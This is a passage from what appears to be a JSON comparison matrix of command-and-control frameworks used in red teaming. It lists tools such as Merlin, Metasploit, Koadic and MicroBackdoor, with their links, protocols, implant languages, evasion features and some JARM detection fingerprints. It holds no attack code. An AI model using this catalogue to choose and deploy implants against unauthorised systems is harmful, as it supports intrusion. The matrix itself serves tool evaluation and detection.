"how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": ".NET", + "implant": ".NET", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "#factionc2 bloodhoundhq.slack.com", + "slack_members": "203", + "gh_issues": "38", + "notes": "" + }, + { + "name": "FlyingAFalseFlag", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/monoxgas/FlyingAFalseFlag", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "11/12/2019", + "version": "POC", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C++", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": 
"1", + "notes": "PostOffice EWS SendGrid & Addendum VirusTotal" + }, + { + "name": "FudgeC2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Ziconius/FudgeC2", + "site": "", + "twitter": "@Ziconius", + "evaluator": "@jorgeorchilles", + "date": "2/11/2020", + "version": "Beta", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "Powershell", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "No", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#fudgec2 bloodhoundhq.slack.com", + "slack_members": "NA", + "gh_issues": "3", + "notes": "" + }, + { + "name": "GC2-sheet", + "license": "NA", + "price": "NA", + "github": "https://github.com/looCiprian/GC2-sheet", + "site": "", + "twitter": "@loogrz", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + 
"logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Google Sheets and Drive" + }, + { + "name": "GoBot2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/SaturnsVoid/GoBot2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "godoh", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/sensepost/goDoH", + "site": "", + "twitter": "@leonjza", + "evaluator": "@cabbagesalad2", + "date": "10/31/2019", + "version": "1.6", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "Yes", + "server": "Go", + "implant": "Go", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "Yes", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + 
"domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "1", + "notes": "" + }, + { + "name": "GRAT2", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/r3nhat/GRAT2", + "site": "", + "twitter": "@r3n_hat", + "evaluator": "@r3n_hat", + "date": "9/1/2021", + "version": "Beta", + "implementation": "", + "how_to": "", + "slingshot": "No", + "kali": "No", + "server": "Python", + "implant": "C#", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "No", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Encrypted Communication using XOR" + }, + { + "name": "HARS", + "license": "MIT", + "price": "NA", + "github": "https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell", + "site": "", + "twitter": "", + "evaluator": "@leekirkpatrick4", + "date": "3/24/2020", + "version": "POC", + "implementation": "python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "C#", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + 
"macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "2", + "notes": "" + }, + { + "name": "Haven", + "license": "Commercial", + "price": "Contact Sales", + "github": "https://pivotlabs.dev/haven/", + "site": "https://docs.pivotlabs.dev/index.html", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "HTTP-RevShell", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/3v4Si0N/HTTP-revshell", + "site": "", + "twitter": "@3v4Si0N", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": 
"", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "ibombshell", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/ElevenPaths/ibombshell", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "11/12/2019", + "version": "0.0.3b", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "5", + "notes": "" + }, + { + "name": "INNUENDO", + "license": "Commercial", + "price": "Contact Sales", + "github": "", + "site": 
"https://www.immunityinc.com/products/innuendo/", + "twitter": "", + "evaluator": "@daveaitel", + "date": "11/11/2019", + "version": "1.7", + "implementation": "install.sh", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "No", + "icmp": "Yes", + "ftp": "Yes", + "imap": "Yes", + "mapi": "Yes", + "smb": "Yes", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Khepri", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/geemion/Khepri", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": 
"", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Koadic C3", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/zerosum0x0/koadic", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "9/27/2019", + "version": "0xA (10)", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "JScript/VBScript", + "multi_user": "No", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "94", + "notes": "Requires valid cert for HTTPS" + }, + { + "name": "Link", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/postrequest/link", + "site": "", + "twitter": "", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + 
"logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "LOLBITS", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Kudaes/LOLBITS", + "site": "", + "twitter": "@Kurosh2907", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MacC2", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/cedowens/MacC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + 
"chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad2ad0002ad2ad22c42d42d000000faabb8fd156aa8b4d8a37853e1063261", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MacShellSwift", + "license": "NA", + "price": "NA", + "github": "https://github.com/cedowens/MacShellSwift", + "site": "", + "twitter": "@cedowens", + "evaluator": "@Adam_Mashinchi", + "date": "11/13/2019", + "version": "N/A", + "implementation": "python", + "how_to": "", + "slingshot": "Yes", + "kali": "", + "server": "Python", + "implant": "Swift", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "No", + "linux": "No", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "TLS", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "2ad000000000000000000000000000eeebf944d0b023a00f510f06a29b4f46", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "" + }, + { + "name": "MACE", + "license": "NA", + "price": "NA", + "github": "https://github.com/nickvangilder/most-average-c2-ever", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": 
"", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MeetC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/CMatri/MeetC2", + "site": "", + "twitter": "", + "evaluator": "", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Merlin", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Ne0nd0g/merlin", + "site": "https://merlin-c2.readthedocs.io/en/latest/", + "twitter": "@merlin_c2", + "evaluator": "@jorgeorchilles", + "date": "11/4/2019", + "version": "0.8.0", + "implementation": "Binary", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Go", + "implant": "Go", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": 
"Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "Yes", + "http3": "Yes", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "aPAKE OPAQUE", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "29d21b20d29d29d21c41d21b21b41d494e0df9532e75299f15ba73156cee38", + "actively_maint": "Yes", + "slack": "#merlin bloodhoundhq.slack.com", + "slack_members": "278", + "gh_issues": "57", + "notes": "Gandalf: https://github.com/r00t0v3rr1d3/merlin/tree/dev" + }, + { + "name": "Metasploit", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/rapid7/metasploit-framework", + "site": "https://metasploit.com", + "twitter": "@metasploit", + "evaluator": "@busterbcook", + "date": "12/4/2019", + "version": "5.0.62", + "implementation": "Ruby", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Ruby", + "implant": "C/Java/PHP/Python", + "multi_user": "Yes", + "ui": "CLI", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "RSA", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "07d14d16d21d21d00042d43d000000aa99ce74e2c6d013c745aa52b5cc042d", + "actively_maint": "Yes", + 
"slack": "metasploit.slack.com", + "slack_members": "4653", + "gh_issues": "3953", + "notes": "" + }, + { + "name": "Meteor", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/degenerat3/meteor", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Meterpeter", + "license": "NA", + "price": "NA", + "github": "https://github.com/r00t-3xp10it/meterpeter", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": 
"", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "" + }, + { + "name": "MicroBackdoor", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/Cr4sh/MicroBackdoor", + "site": "", + "twitter": "@d_olex", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "MikeC2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/mlgualtieri/PurpleTeamSummit/tree/main/Summit-May2021", + "site": "", + "twitter": "@mlgualtieri", + "evaluator": "Contribute", + "date": "5/25/2021", + "version": "", + "implementation": "C# / PHP", + "how_to": "No", + "slingshot": "No", + "kali": "No", + "server": "PHP", + "implant": "C#", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": 
"No", + "kill_date": "Yes", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "No", + "blog": "No", + "c2_matrix_indicators": "", + "jarm": "No", + "actively_maint": "No", + "slack": "No", + "slack_members": "", + "gh_issues": "", + "notes": "The MikeC2 agent is best loaded with MikeDrop" + }, + { + "name": "Mistica", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/IncideDigital/Mistica", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Mythic", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/its-a-feature/Mythic", + "site": "https://docs.mythic-c2.net/", + "twitter": "@its_a_feature_", + "evaluator": "@jorgeorchilles", + "date": "10/6/2019", + "version": "1.3", + "implementation": "Docker", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": 
